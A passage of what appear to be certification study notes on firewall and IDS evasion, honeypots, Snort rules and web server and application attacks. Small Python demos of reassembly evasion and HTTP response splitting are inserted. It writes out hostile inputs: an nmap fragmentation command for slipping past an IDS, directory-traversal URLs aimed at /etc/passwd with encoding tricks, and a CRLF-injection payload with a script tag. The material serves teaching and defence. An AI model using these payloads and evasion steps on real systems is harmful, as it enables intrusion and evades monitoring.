40 | - **Proxy Firewall** - Mediates communications between untrusted and trusted end-points (servers/hosts/clients). A proxy firewall is a network security system that protects network resources by filtering messages at the Application Layer (7). A proxy firewall may also be called an application firewall or gateway firewall.
41 |
42 | ### **Proxy Types:**
43 | - **Circuit-level proxy** - Firewall that works on **Layer 5 (Session layer)**; They monitor TCP handshaking between packets to determine whether a requested session is legitimate.
44 | - **Application-level proxy** - Any service or server that acts as a proxy for client computer requests at the application’s protocols.
45 |
46 | > **⚠️ An application-level proxy is one that knows about the particular application it is providing proxy services for; it understands and interprets the commands in the application protocol. A circuit-level proxy is one that creates a circuit between the client and the server without interpreting the application protocol.**
47 |
48 | - **Multi-homed Firewall (dual-homed)** - Firewall that has two or more interfaces; One interface is connected to the untrusted network and another interface is connected to the trusted network. A DMZ can be added to a multi-homed firewall just by adding a third interface.
49 |
50 | - **Bastion hosts** - Endpoint that is exposed to the internet but has been hardened to withstand attacks; Hosts on the screened subnet designed to protect internal resources.
51 |
52 | - **Screened host** - Endpoint that is protected by a firewall.
53 |
54 | - **Packet-filtering** - Firewalls that only look at headers
55 |
56 |
57 | > ⚠️ Uses rules that **implicitly deny** traffic unless it is explicitly allowed.
58 |
59 | > ⚠️ Oftentimes uses **network address translation** (NAT) which can apply a one-to-one or one-to-many relationship between external and internal IP addresses.
60 |
61 | > ⚠️ **Private zone** - hosts internal hosts that only respond to requests from within that zone
62 |
63 |
64 | ## Honeypots 🍯
65 | *Honeypots are decoy systems or servers deployed alongside production systems within your network. When deployed as enticing targets for attackers, honeypots can add security monitoring opportunities for blue teams and misdirect the adversary from their true target.*
66 |
67 | - **Honeynet** - Two or more honeypots on a network form a honeynet. Honeynets and honeypots are usually implemented as parts of larger Network Intrusion Detection Systems.
68 |
69 | - A **Honeyfarm** is a centralized collection of honeypots and analysis tools.
70 |
71 | ### **Types of Honeypots:**
72 | 1. **Low-interaction** ---> Simulates/imitates services and systems that frequently attract criminal attention. They offer a method for collecting data from blind attacks such as botnets and worm malware.
73 | 2. **High interaction** ---> Simulates all services and applications and is designed to be completely compromised
74 | 3. **Production** ---> Serve as decoy systems inside fully operating networks and servers, often as part of an intrusion detection system (IDS). They deflect criminal attention from the real system while analyzing malicious activity to help mitigate vulnerabilities.
75 | 4. **Research** ---> Used for educational purposes and security enhancement. They contain trackable data that you can trace when stolen to analyze the attack.
76 |
77 | - **Honeypot Tools:**
78 | - Specter
79 | - Honeyd
80 | - KFSensor (Honeypot IDS)
81 |
82 | ## Evading with Nmap
83 |
84 | ### **Useful switches for evasion and stealth**:
85 |
86 | Nmap Switch | Information
87 | --|--
88 | `-v` | Verbose level
89 | `-sS` | TCP SYN scan
90 | `-T` | Time template for performing the scan
91 | `-f` | Use fragmented IP packets
92 | `-f --mtu` | Use fragmented packets & set MTU
93 | `-D` | IP address decoy: cloak a scan with decoys
94 | `-S` | Spoof the source IP address
95 | `--send-eth` | Send raw Ethernet frames, bypassing the IP layer
96 | `--data-length` | Append the given number of random data bytes to the packets
97 | `--source-port` | Specify the source port to use for the scan
98 |
99 | ---
100 | ### **Example:**
101 |
102 | - Sends fragmented IPv4 packets (MTU 32, 50 bytes of appended data); the fragments are too small for an IDS to recognise as a probe/scanning technique:
103 |
104 | `nmap -v -sS -f --mtu 32 --send-eth --data-length 50 --source-port 8965 -T5 192.168.0.22`
105 |
106 | > ⚠️ **Fragmentation is the heart of the IDS/Firewall Evasion techniques.**
107 | ---
108 |
109 | ## Using SNORT
110 | *SNORT is an open source network intrusion detection system (NIDS). Snort is a packet sniffer that monitors network traffic in real time, scrutinizing each packet closely to detect a dangerous payload or suspicious anomalies.*
111 |
112 | - Snort is a widely deployed IDS that is open source
113 | - Includes a **sniffer**, **traffic logger** and a **protocol analyzer**
114 | - Runs in three different modes
115 | - **Sniffer** - Watches packets in real time
116 | - **Packet logger** - Saves packets to disk for review at a later time
117 | - **NIDS** - Analyzes network traffic against various rule sets
118 | - Configuration is in `/etc/snort` on Linux and `C:\snort\etc` in Windows; the file is **snort.conf**.
119 |
120 | ### **SNORT basics commands:**
121 |
122 | **Operational modes:**
123 | - Snort as **Sniffer** ---> `snort -v`
124 |
125 | - Snort as **Packet logger** ---> `snort -l`
126 |
127 | - Snort as **NIDS** ---> `snort -A` or `snort -c `
128 |
129 | **Example of usage**:
130 |
131 | - **`snort -i 4 -l c:\Snort\log -c c:\Snort\etc\snort.conf -T`**
132 | - *This command will test the Snort configuration and rules and check whether there are any errors, without starting up.*
133 | - `-i 4` ---> interface specifier; in this case interface 4.
134 | - `-l` ---> for logging
135 | - `-c` ---> use the Snort rules file at the given path
136 | - `-T` ---> Test only; prevents Snort from starting up. Essentially checks whether there are any errors and whether the rules are good.
137 |
138 | - **`snort -i 4 -c c:\Snort\etc\snort.conf -l c:\Snort\log -K ascii`**
139 | - *This command will fire up Snort NIDS and log everything in ASCII.*
140 |
141 | **Basic commands**:
142 | Flag | Information
143 | -|-
144 | `-A` | Set alert mode: fast, full, console, test or none
145 | `-b` | Log packets in tcpdump format (much faster!)
146 | `-B ` | Obfuscate IP addresses in alerts and packet dumps using CIDR mask
147 | `-c ` | Use Rules file
148 | `-C` | Print out payloads with character data only (no hex)
149 | `-l` | Specifies the logging directory (all alerts and packet logs are placed in this directory)
150 | `-i ` | Specifies which interface Snort should listen on
151 | `-K` | Logging mode (pcap[default], ascii, none)
152 | `-?` | Lists all switches and options and then exits
153 |
154 | ### **SNORT Rules**
155 | *SNORT has a rules engine that allows for customization of monitoring and detection capabilities.*
156 |
157 | - **There are three available rule actions**
158 | 1. Alert
159 | 2. Pass
160 | 3. Log
161 | - **And three available IP protocols:**
162 | 1. TCP
163 | 2. UDP
164 | 3. ICMP
165 |
166 | ### **Breaking down a Snort rule:**
167 |
168 | > **`alert icmp any any -> $HOME_NET any (msg:"ICMP test"; sid:1000001; rev:1; classtype:icmp-event;)`**
169 |
170 | Rule part | Information
171 | -|-
172 | `alert icmp any any -> $HOME_NET any` | **Rule Header** ⬇️
173 | `alert` | Rule action. Snort will generate an alert when the set condition is met.
174 | `any` (1st) | Source IP. Snort will look at all sources
175 | `any` (2nd) | Source port. Snort will look at all ports
176 | `->` | Direction. From source to destination; *(source -> destination)*
177 | `$HOME_NET` | Destination IP. We are using the HOME_NET value from the snort.conf file, a variable that defines the network or networks you are trying to protect.
178 | `any` (3rd) | Destination port. Snort will look at all ports on the protected network
179 | `(msg:"ICMP test"; sid:1000001; rev:1; classtype:icmp-event;)` | **Rule Options** ⬇️
180 | `msg:"ICMP test"` | Snort will include this message with the alert
181 | `sid:1000001` | Snort rule ID. Remember that all numbers < 1,000,000 are reserved, which is why we start at 1000001 (you may use any number, as long as it's greater than 1,000,000)
182 | `rev:1` | Revision number. This option allows for easier rule maintenance
183 | `classtype:icmp-event` | Categorizes the rule as an "icmp-event", one of the predefined Snort categories. This option helps with rule organization
184 | ---
185 | ### Rules Examples:
186 | > **`alert tcp 192.168.x.x any -> $HOME_NET 21 (msg:"FTP connection attempt"; sid:1000002; rev:1;)`**
187 | - TCP alert on traffic from source IP address 192.168.x.x on any port to HOME_NET on port 21 (FTP).
188 |
189 | > **`alert tcp $HOME_NET 21 -> any any (msg:"FTP failed login"; content:"Login or password incorrect"; sid:1000003; rev:1;)`**
190 | - TCP alert in HOME_NET port 21 (FTP) as a source, to any destination IP address and port.
191 |
192 | > **`alert tcp !$HOME_NET any -> $HOME_NET 31337 (msg:"BACKDOOR ATTEMPT-BackOrifice"; sid:1000004; rev:1;)`**
193 | - This alerts on traffic coming from outside HOME_NET (`!$HOME_NET`) to the internal network on port 31337.
194 |
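To make the rule anatomy concrete, here is an added example (not from the original notes, and not Snort's own code): a small Python evaluator that parses rules in the header/options form broken down above, resolves `$HOME_NET` and `!` negation, and runs the three example rules against constructed packets. The `HOME_NET` value, the packets and the `sid` given to the third rule are assumptions; the parser is deliberately simplified (it evaluates only the `content` payload option and does not handle `;` inside quoted strings).

```python
import ipaddress
import re

# Assumption: HOME_NET as it would be set in snort.conf (constructed value).
VARS = {"HOME_NET": ipaddress.ip_network("192.168.1.0/24")}

RULE_RE = re.compile(
    r"^(?P<action>alert|log|pass)\s+(?P<proto>tcp|udp|icmp|ip)\s+"
    r"(?P<src>\S+)\s+(?P<sport>\S+)\s+(?P<direction>->|<>)\s+"
    r"(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<options>.*)\)\s*$"
)


def parse_rule(text):
    """Split a rule into its header fields and an options dict (simplified: no quoted ';')."""
    m = RULE_RE.match(text.strip())
    if m is None:
        raise ValueError(f"not a rule header: {text!r}")
    rule = m.groupdict()
    options = {}
    for item in rule.pop("options").split(";"):
        item = item.strip()
        if item:
            key, _, value = item.partition(":")
            options[key.strip()] = value.strip().strip('"')
    rule["options"] = options
    return rule


def _match_addr(spec, ip):
    negate = spec.startswith("!")
    spec = spec.lstrip("!")
    if spec == "any":
        hit = True
    elif spec.startswith("$"):
        hit = ipaddress.ip_address(ip) in VARS[spec[1:]]   # variable from snort.conf
    else:
        hit = ipaddress.ip_address(ip) in ipaddress.ip_network(spec, strict=False)
    return hit != negate


def _match_port(spec, port):
    negate = spec.startswith("!")
    spec = spec.lstrip("!")
    if spec == "any":
        hit = True
    elif ":" in spec:                       # ranges such as 1024:, :1023 or 20:21
        lo, _, hi = spec.partition(":")
        hit = (int(lo) if lo else 0) <= port <= (int(hi) if hi else 65535)
    else:
        hit = port == int(spec)
    return hit != negate


def rule_matches(rule, pkt):
    """Header match plus the one payload option ('content') used in the rules above."""
    if rule["proto"] != "ip" and rule["proto"] != pkt["proto"]:
        return False

    def one_way(src, sport, dst, dport):
        return (_match_addr(rule["src"], src) and _match_port(rule["sport"], sport)
                and _match_addr(rule["dst"], dst) and _match_port(rule["dport"], dport))

    hit = one_way(pkt["src"], pkt["sport"], pkt["dst"], pkt["dport"])
    if rule["direction"] == "<>":
        hit = hit or one_way(pkt["dst"], pkt["dport"], pkt["src"], pkt["sport"])
    if not hit:
        return False
    content = rule["options"].get("content")
    return content is None or content.encode() in pkt.get("payload", b"")


def run_rules(rules, packets):
    """Return (sid, msg) for every alert rule that fires, in packet order."""
    return [(r["options"]["sid"], r["options"]["msg"])
            for pkt in packets for r in rules
            if r["action"] == "alert" and rule_matches(r, pkt)]


# The rules from the notes (the third one given a sid, which Snort requires) ...
RULES = [parse_rule(r) for r in [
    'alert icmp any any -> $HOME_NET any (msg:"ICMP test"; sid:1000001; rev:1; classtype:icmp-event;)',
    'alert tcp $HOME_NET 21 -> any any (msg:"FTP failed login"; content:"Login or password incorrect"; sid:1000003; rev:1;)',
    'alert tcp !$HOME_NET any -> $HOME_NET 31337 (msg:"BACKDOOR ATTEMPT-BackOrifice"; sid:1000004; rev:1;)',
]]

# ... and constructed packets to run them against (ICMP has no ports, so 0 is used).
PACKETS = [
    {"proto": "icmp", "src": "10.0.0.5", "sport": 0, "dst": "192.168.1.10", "dport": 0},
    {"proto": "tcp", "src": "192.168.1.10", "sport": 21, "dst": "10.0.0.5", "dport": 50000,
     "payload": b"530 Login or password incorrect.\r\n"},
    {"proto": "tcp", "src": "10.0.0.5", "sport": 4444, "dst": "192.168.1.10", "dport": 31337},
    {"proto": "tcp", "src": "192.168.1.20", "sport": 5555, "dst": "192.168.1.10", "dport": 31337},
    {"proto": "tcp", "src": "192.168.1.10", "sport": 21, "dst": "10.0.0.5", "dport": 50001,
     "payload": b"230 Login successful.\r\n"},
]

if __name__ == "__main__":
    for sid, msg in run_rules(RULES, PACKETS):
        print(f"[{sid}] {msg}")
```

The fourth packet is the instructive one: it hits port 31337 but comes from inside HOME_NET, so the `!$HOME_NET` source in the BackOrifice rule keeps it silent, which is exactly the blind spot a rule written only for external sources has.
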
195 | **Example output**
196 | - 10/19-14:48:38.543734 0:48:542:2A:67 -> 0:10:B5:3C:34:C4 type:0x800 len:0x5EA
197 | - **xxx -> xxx TCP TTL:64 TOS:0x0 ID:18112 IpLen:20 DgmLen:1500 DF**
198 | - Important info is bolded
199 |
200 | ## Evasion Concepts and Techniques
201 |
202 | - **Insertion Attack** - Attacker forces the IDS to process invalid packets.
203 |
204 | - **Evasion** - An endpoint accepts a packet that the IDS would normally reject. Typically executed via **fragmentation** of the attack packets to allow them to be moved through the IDS.
205 |
206 | - **Obfuscation** - Encoding the attack packets in such a way that the target is able to decode them, but the IDS is not.
207 | - Unicode
208 | - Polymorphic code
209 | - Encryption
210 | - Path manipulation to cause signature mismatch
211 |
212 | - **False Positive Generation Events** - Crafting malicious packets designed to set off alarms with hope of distracting/overwhelming IDS and operators.
213 |
214 | - **Session Splicing** - Just another type of fragmentation attack.
215 |
216 | - **Unicode encoding** - works with web requests - using Unicode characters instead of ascii can sometimes get past
217 |
218 | - **Fragmentation attack** - Splits up packets so that the IDS can't detect the real intent
219 |
220 | - **Overlapping Fragments** - Generate a bunch of tiny fragments overlapping TCP sequence numbers.
221 |
222 | - **Time-To-Live (TTL) Attack** - Requires the attacker to have inside knowledge of the target network to allow for the adjustment of the TTL values to control who gets what packets when.
223 |
224 | - **Invalid RST Packets** - Manipulation of the RST flag to trick IDS into ignoring the communication session with the target.
225 |
226 | - **Urgency Flag - URG** - Manipulation URG flag to cause the target and IDS to have different sets of packets, because the IDS processes ALL packets irrespective of the URG flag, whereas the target will only process URG traffic.
227 |
228 | - **Polymorphic Shellcode** - Blow up the pattern matching by constantly changing.
229 |
230 | - **ASCII Shellcode** - Use ASCII characters to bypass pattern matching.
231 |
232 | - **Application-Level Attacks** - Hide the attack inside compressed or otherwise encoded application data (e.g. compressed file transfers); an IDS that does not decompress/decode the payload cannot inspect it.
233 |
234 | - **Desynchronization** - Manipulating TCP connection setup (a pre- or post-connection SYN with bogus sequence numbers) so the IDS tracks the wrong sequence space and ignores the real attack stream.
235 |
236 | - **Encryption** - Using encryption to hide attack.
237 |
238 | - **Flood the network** - Trigger alerts that aren't your intended attack so that you confuse firewalls/IDS and network admins; Overwhelming the IDS.
239 |
240 | > ⚠️ **Slow down** - Aggressive scanning such as nmap's -T5 timing template is likely to trip rate-based alerts and get you caught. Slower templates (-T1, -T2) are far less noisy, at the cost of time.
241 |
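The three stream-level tricks above (session splicing, overlapping data, insertion) all come down to one question: does the IDS rebuild the byte stream the same way the target does? The following Python is an added example, not code from the original notes. It models segments as `(relative_seq, payload, checksum_ok)` tuples with no packet capture involved; the checksum flag stands in for any reason a real host would discard a segment (bad checksum, expired TTL) that a lax IDS might still process. The segment contents and the `/bin/sh` signature are constructed for the demo.

```python
"""Why signature matching needs target-aware stream reassembly.

Added example (not from the original notes). Models three of the evasion
concepts above with plain Python:
  * session splicing  - the attack string is spread over tiny segments
  * overlapping data  - two segments claim the same byte range
  * insertion         - the IDS accepts a segment the target will drop
"""

SIGNATURE = b"/bin/sh"  # the pattern the IDS is looking for


def splice(payload: bytes, size: int) -> list:
    """Session splicing: cut one request into size-byte segments."""
    return [(i, payload[i:i + size], True) for i in range(0, len(payload), size)]


def naive_per_segment_match(segments, signature=SIGNATURE) -> bool:
    """What a stateless matcher does: inspect each segment on its own."""
    return any(signature in data for _, data, _ok in segments)


def reassemble(segments, policy="first", verify_checksums=True) -> bytes:
    """Rebuild the byte stream the way a host (or an IDS) would.

    policy:           which copy wins when two segments overlap; "first" keeps
                      the earliest-arriving bytes, "last" the newest. Real
                      stacks differ, which is why Snort's stream preprocessor
                      has per-target reassembly policies.
    verify_checksums: drop segments whose checksum flag is False, as every real
                      host does; an IDS that skips this can be fed chaff
                      (insertion attack).
    """
    accepted = [s for s in segments if s[2] or not verify_checksums]
    if not accepted:
        return b""
    total = max(seq + len(data) for seq, data, _ in accepted)
    stream = bytearray(total)
    filled = [False] * total
    for seq, data, _ in accepted:            # arrival order matters for overlap
        for i, byte in enumerate(data):
            pos = seq + i
            if policy == "first" and filled[pos]:
                continue
            stream[pos] = byte
            filled[pos] = True
    return bytes(stream)


# --- constructed sample traffic ---------------------------------------------
# 1. Session splicing: 3-byte segments, none of which contains the signature.
SPLICED = splice(b"GET /cgi-bin/../../bin/sh HTTP/1.0\r\n\r\n", 3)

# 2. Overlap: both segments are valid; which one "wins" depends on the stack.
OVERLAP = [(0, b"GET /", True), (5, b"pub/ok", True), (5, b"bin/sh", True)]

# 3. Insertion: the decoy segment has a bad checksum. The target drops it; an
#    IDS that does not verify checksums keeps it and sees the decoy.
INSERTION = [(0, b"GET /", True), (5, b"pub/ok", False), (5, b"bin/sh", True)]


if __name__ == "__main__":
    print("spliced, per-segment match :", naive_per_segment_match(SPLICED))
    print("spliced, after reassembly  :", SIGNATURE in reassemble(SPLICED))
    print("overlap, first-wins stack  :", reassemble(OVERLAP, "first"))
    print("overlap, last-wins stack   :", reassemble(OVERLAP, "last"))
    print("insertion, lax IDS view    :", reassemble(INSERTION, verify_checksums=False))
    print("insertion, target's view   :", reassemble(INSERTION, verify_checksums=True))
```

The takeaway for the defender is the one Ptacek and Newsham made: an IDS must normalise traffic exactly as the protected host does (checksums, TTL reachability, overlap policy), or it is matching signatures against a stream nobody receives.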
242 | **Tools for Evasion**
243 | - **Nessus** - Also a vulnerability scanner
244 | - **ADMmutate** - Creates scripts not recognizable by signature files
245 | - **NIDSbench** - Older tool for fragmenting bits
246 | - **Inundator** - Flooding tool
247 |
248 | ## Firewall Evasion
249 | - **Firewalking** - Traceroute-style probing with crafted TTL values to determine which ports/protocols a gateway's ACL lets through and to map the hosts behind it from the IP responses; in effect walking every port on the firewall to see what is open.
250 |
251 | - **Banner Grabbing** - Looking for FTP, TELNET and web server banners.
252 |
253 | - **IP Address Spoofing** - Hijacking technique allowing attacker to masquerade as a trusted host.
254 |
255 | - **Source Routing** - Allows the sender of a packet to partially or fully specify the route to be used.
256 |
257 | - **Tiny Fragments** - Succeeds against firewalls that only inspect the first fragment: the fragments are made so small that the TCP header itself (ports, flags) is split across packets, hiding the true intention of the attack from a filter that never sees the complete header.
258 |
259 | - **ICMP Tunneling** - Tunnels a backdoor shell inside ICMP echo request/reply packets. RFC 792 does not define what goes in the data portion of an echo packet, so arbitrary payload looks acceptable; a firewall that allows ICMP echo and does not examine the payload lets the attack traffic through.
260 |
261 | - **ACK Tunneling** - Sends packets with the ACK flag set so they appear to belong to an established connection; stateless packet filters that permit any ACK-flagged segment (assuming an existing session) let them through without ever seeing a SYN.
262 |
263 | - **HTTP Tunneling** - Use of HTTP traffic to 'hide' attacks.
264 |
265 | - **SSH Tunneling** - Use of SSH to encrypt and send attack traffic.
266 |
267 | - **MitM Attacks** - Use of DNS and routing manipulation to bypass firewalls.
268 |
269 | - **XSS Attacks** - Exploit weaknesses in how a web application handles user-supplied input and builds its responses. The attacker injects HTML/JavaScript that the victim's browser executes from inside the trusted site, so the resulting requests pass any perimeter firewall as legitimate web traffic.
270 |
271 | - *Use IP in place of a URL - may work depending on nature of filtering in place*
272 | - *Use Proxy Servers/Anonymizers - May work depending on nature of filtering in place*
273 | - *ICMP Type 3 Code 13 will show that traffic is being blocked by firewall*
274 | - *ICMP Type 3 Code 3 tells you the client itself has the port closed*
275 |
276 | - **Tools**
277 | - CovertTCP
278 | - ICMP Shell
279 | - 007 Shell
280 | - The best way around a firewall will always be a compromised internal machine
281 |
282 | ## How to detect a Honeypot
283 | *Probe services running on them; Ports that show a service is available, but **deny a three-way handshake may indicate that the system is a honeypot***.
284 |
285 | * **Layer 7 (Application)** - Examine latency of responses from server
286 | * **Layer 4 (Transport)** - Examine the TCP window size, looking for continuous acknowledgement of incoming packets even when the window size is set to 0 (a real stack would stop accepting data).
287 | * **Layer 2 (Data Link)** - If you are on the same network as the honeypot, **look for MAC addresses** in packets that indicate the presence of a **'Black Hole'** (`0:0:f:ff:ff:ff`)
288 |
289 | > ⚠️ **The exam will not cover every information presented, but is good to have a general idea.**
290 |
291 | * If Honeypot is virtualized, look for the vendor assigned MAC address ranges as published by IEEE.
292 | * If Honeypot is the **Honeyd** type, use time based TCP fingerprinting methods to detect
293 | * Detecting **User-Mode Linux (UML) honeypot**, analyze `proc/mounts`, `proc/interrupts` and `proc/cmdline` which would have UML specific settings and information.
294 | * Detecting Sebek-based honeypots, Sebek will log everything that is accessed via `read()` **before** sending to the network, causing congestion that can be an indicator.
295 | * Detecting **snort_inline honeypots**, analyze the outgoing packets by capturing the snort_inline modified packets through another
296 |
--------------------------------------------------------------------------------
/13-Hacking-Web-Servers.md:
--------------------------------------------------------------------------------
1 | # Hacking Web Servers
2 |
3 | ## Web Server Attack Methodology
4 |
5 | - **Information Gathering** - Internet searches, whois, reviewing robots.txt
6 |
7 | - **Web Server Footprinting** - banner grabbing
8 | - **Tools**
9 | - Netcraft
10 | - HTTPRecon
11 | - theHarvester
12 | - ID Serve
13 | - HTTPrint
14 | - nmap
15 | - `nmap --script http-trace -p80 localhost`
16 | - Checks whether the TRACE method is enabled (cross-site tracing risk)
17 | - `nmap --script http-google-email `
18 | - Lists email addresses
19 | - `nmap --script hostmap-* `
20 | - Discovers virtual hosts on the IP address you are trying to footprint; * is replaced by an online db such as IP2Hosts
21 | - `nmap --script http-enum -p80 `
22 | - Enumerates common web apps
23 | - `nmap --script http-robots.txt -p 80 `
24 | - Grabs the robots.txt file
25 |
26 | - **Website Mirroring** - brings the site to your own machine to examine structure, etc.
27 | - **Tools**
28 | - Wget
29 | - BlackWidow
30 | - HTTrack
31 | - WebCopier Pro
32 | - Web Ripper
33 | - SurfOffline
34 |
35 | - **Vulnerability Scanning** - scans web server for vulnerabilities
36 | - **Tools**
37 | - Nessus
38 | - Nikto - specifically suited for web servers; still very noisy like Nessus
39 |
40 | - **Session Hijacking**
41 |
42 | - **Web Server Password Cracking**
43 |
44 | ## Web Server Architecture
45 |
46 | - **Most Popular Servers** - Apache, Microsoft IIS and Nginx
47 | - Apache is configured through text files (httpd.conf and per-directory .htaccess) and extended through loadable modules
48 | - Older IIS (IIS 5 and earlier) ran all applications in the context of LOCAL_SYSTEM; modern IIS runs them under low-privilege application pool identities
49 | - IIS 5 had a ton of bugs - easy to get into
50 | - **N-Tier Architecture** - distributes processes across multiple servers; normally as three-tier: Presentation (web), logic (application) and data (database)
51 | - **Error Reporting** - should not be showing errors in production; easy to glean information
52 | - **HTML** - markup language used to display web pages
53 | - **HTTP Request Methods**
54 | - **GET** - retrieves whatever information is in the URL; sending data is done in URL
55 | - **HEAD** - identical to GET except no body is returned
56 | - **POST** - sends data via body - data not shown in URL or in history
57 | - **PUT** - requests data be stored at the URL
58 | - **DELETE** - requests origin server delete resource
59 | - **TRACE** - requests application layer loopback of message
60 | - **CONNECT** - reserved for use with proxy
61 | - Both POST and GET can be manipulated by a web proxy
62 | - **HTTP Status Codes** (only 4xx and 5xx are errors)
63 | - **1xx: Informational** - request received, continuing
64 | - **2xx: Success** - action received, understood and accepted
65 | - **3xx: Redirection** - further action must be taken
66 | - **4xx: Client Error** - request contains bad syntax or cannot be fulfilled
67 | - **5xx: Server Error** - server failed to fulfill an apparently valid request
68 |
69 | ## Web Server Attacks
70 |
71 | - **DNS Amplification** - Sends small DNS queries with the victim's spoofed source address to open recursive resolvers; the much larger answers all go to the victim, flooding it until it can't do anything
72 |
73 | - **Directory Traversal** (../ or dot-dot-slash) - requests a file that should not be reachable from the web server's document root
74 | - Example: http://www.example.com/../../../../etc/passwd
75 | - Can URL-encode the sequence to possibly evade IDS/filters - %2e for dot and %2f for slash (e.g. %2e%2e%2f), or double-encode it (%252e%252e%252f)
76 |
77 | - **Parameter Tampering** (URL Tampering) - Manipulating parameters within URL to achieve escalation or other changes
78 |
79 | - **Hidden Field Tampering** - Modifying hidden form fields producing unintended results
80 |
81 | - **HTTP Response Splitting** - An attacker gets CR/LF characters into a value the application copies into a response header (e.g. a redirect target), terminating that response early and supplying a second, fully attacker-controlled response; used to poison caches and deliver XSS.
82 |
83 | - **Web Cache Poisoning** - Tricking a caching proxy or browser cache into storing an attacker-controlled response (often via response splitting) so that other users are served the malicious version
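To make the splitting mechanism concrete, here is an added example (not code from the original notes) of a redirect handler that copies a `next` parameter into the `Location` header, together with a minimal client-side parser that shows the single response being read as two. The handler names, the `/home` redirect and the injected second response are constructed for the demo.

```python
"""HTTP response splitting: CRLF injection into a response header.

Added example, not from the original notes. The server means to send one
302; because the attacker's value contains CR/LF pairs, a client or cache
parses two responses, the second one entirely attacker-controlled.
"""


def render_redirect(next_url: str) -> bytes:
    """Builds the raw 302 exactly as the server would emit it."""
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {next_url}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("latin-1")


def build_redirect_vulnerable(next_url: str) -> bytes:
    """Reflects the parameter into the header with no CR/LF filtering."""
    return render_redirect(next_url)


def build_redirect_safe(next_url: str) -> bytes:
    """Reject header values containing line terminators (what modern
    frameworks do; Python's http.client, for one, raises on CR/LF)."""
    if "\r" in next_url or "\n" in next_url:
        raise ValueError("CR/LF not allowed in header value")
    return render_redirect(next_url)


def parse_responses(raw: bytes) -> list:
    """Split a byte stream into HTTP responses the way a client would:
    status line, headers, then Content-Length bytes of body."""
    responses, pos = [], 0
    while True:
        end = raw.find(b"\r\n\r\n", pos)
        if end == -1:
            break
        head = raw[pos:end].decode("latin-1").split("\r\n")
        status = head[0]
        if not status.startswith("HTTP/"):
            break  # trailing junk, not a response
        headers = dict(line.split(": ", 1) for line in head[1:] if ": " in line)
        length = int(headers.get("Content-Length", "0"))
        body_start = end + 4
        responses.append({
            "status": status,
            "headers": headers,
            "body": raw[body_start:body_start + length],
        })
        pos = body_start + length
    return responses


# Constructed attacker value for ?next=... (shown already URL-decoded).
SPLIT_PAYLOAD = (
    "/home\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 25\r\n"
    "\r\n"
    "<script>alert(1)</script>"
)

if __name__ == "__main__":
    for r in parse_responses(build_redirect_vulnerable(SPLIT_PAYLOAD)):
        print(r["status"], r["headers"], r["body"])
    try:
        build_redirect_safe(SPLIT_PAYLOAD)
    except ValueError as err:
        print("hardened handler:", err)
```

In a real attack the second response is what a shared cache or a pipelining proxy pairs with the *next* request, which is how response splitting turns into cache poisoning.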
84 |
85 | - **WFETCH** - Microsoft tool that allows you to craft HTTP requests to see response data
86 |
87 | - **Misconfiguration Attack** - Same as before - improper configuration of a web server. (e.g: Default settings like admin/password credentials; Lack of security controls)
88 |
89 | - **Password Attack** - Attempting to crack passwords related to web resources
90 |
91 | - **Connection String Parameter Pollution** - Injecting `;`-separated key=value pairs into a database connection string so that attacker-supplied parameters (e.g. the data source or credentials) override the application's own, taking advantage of how connection strings are parsed
92 |
93 | - **Web Defacement** - Simply modifying a web page to say something else
94 |
95 | - **DoS/DDoS** - Compromise availability
96 |
97 | - **Shellshock** - Bash (CVE-2014-6271) executes commands appended after a function definition stored in an environment variable; web servers that copy request data into environment variables (CGI) were exploitable remotely
98 |
99 | - **Tools**
100 | - **Brutus** - brute force web passwords of HTTP
101 | - **Hydra** - network login cracker
102 | - **Metasploit**
103 | - Basic working: the framework libraries expose interfaces (console, web) through which modules are selected and launched against target services
104 | - **Exploits** hold the actual exploit
105 | - **Payload** contains the arbitrary code if exploit is successful
106 | - **Auxiliary** used for one-off actions (like a scan)
107 | - **NOPS** used for buffer-overflow type operations
108 |
--------------------------------------------------------------------------------
/14-Hacking-Web-Applications.md:
--------------------------------------------------------------------------------
1 | # Hacking Web Applications
2 |
3 | ## Web Organizations
4 |
5 | - **Internet Engineering Task Force (IETF)** - Creates engineering documents to help make the Internet work better.
6 | - **World Wide Web Consortium (W3C)** - A standards-developing community.
7 | - **Open Web Application Security Project (OWASP)** - Organization focused on improving the security of software.
8 |
9 | ## OWASP Web Top 10
10 |
11 |
12 |
13 |
14 |
15 | *The [OWASP Top 10](https://owasp.org/www-project-top-ten/) is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications.*
16 |
17 | - **A1 - Injection Flaws** - SQL, OS and LDAP injection
18 | - **A2 - Broken Authentication and Session Management** - functions related to authentication and session management that aren't implemented correctly
19 | - **A3 - Sensitive Data Exposure** - not properly protecting sensitive data (SSN, CC numbers, etc.)
20 | - **A4 - XML External Entities (XXE)** - exploiting XML processors by uploading hostile content in an XML document
21 | - **A5 - Broken Access Control** - having improper controls on areas that should be protected
22 | - **A6 - Security Misconfiguration** - across all parts of the server and application
23 | - **A7 - Cross-Site Scripting (XSS)** - taking untrusted data and sending it without input validation
24 | - **A8 - Insecure Deserialization** - improperly de-serializing data
25 | - **A9 - Using Components with Known Vulnerabilities** - libraries and frameworks that have known security holes
26 | - **A10 - Insufficient Logging and Monitoring** - not having enough logging to detect attacks
27 |
28 | **WebGoat** - project maintained by OWASP which is an insecure web application meant to be tested
29 |
30 |
31 | ## Web Application Attacks
32 |
33 | - Most often hacked because of inherent weaknesses built into the program
34 | - First step is to identify entry points (POST data, URL parameters, cookies, headers, etc.)
35 | - **Tools for Identifying Entry Points**
36 | - WebScarab
37 | - HTTPPrint
38 | - BurpSuite
39 | - **Web 2.0** - dynamic applications (AJAX, rich client-side code, exposed APIs); larger attack surface because of the many asynchronous client-server calls and the logic that moves into the browser
40 |
41 | ---
42 | ## **SQL Injection**
43 |
44 | Injecting SQL commands into input fields to produce output
45 | - Data Handling - Definition (DDL), manipulation (DML) and control (DCL)
46 |
47 | SQL injection usually occurs when you ask a user for input, like their username/userid, and instead of a name/id, the user gives you an SQL statement that you will unknowingly run on your database.
48 |
49 | - **SQLi is used for**:
50 | - Bypass authentication
51 | - Extract information
52 | - Insert, modify or delete data
53 |
54 |
55 | **SQL Syntax - Basics:**
56 |
57 | SQL Command | Info.
58 | -- | :--
59 | ``SELECT`` | extracts data from a database
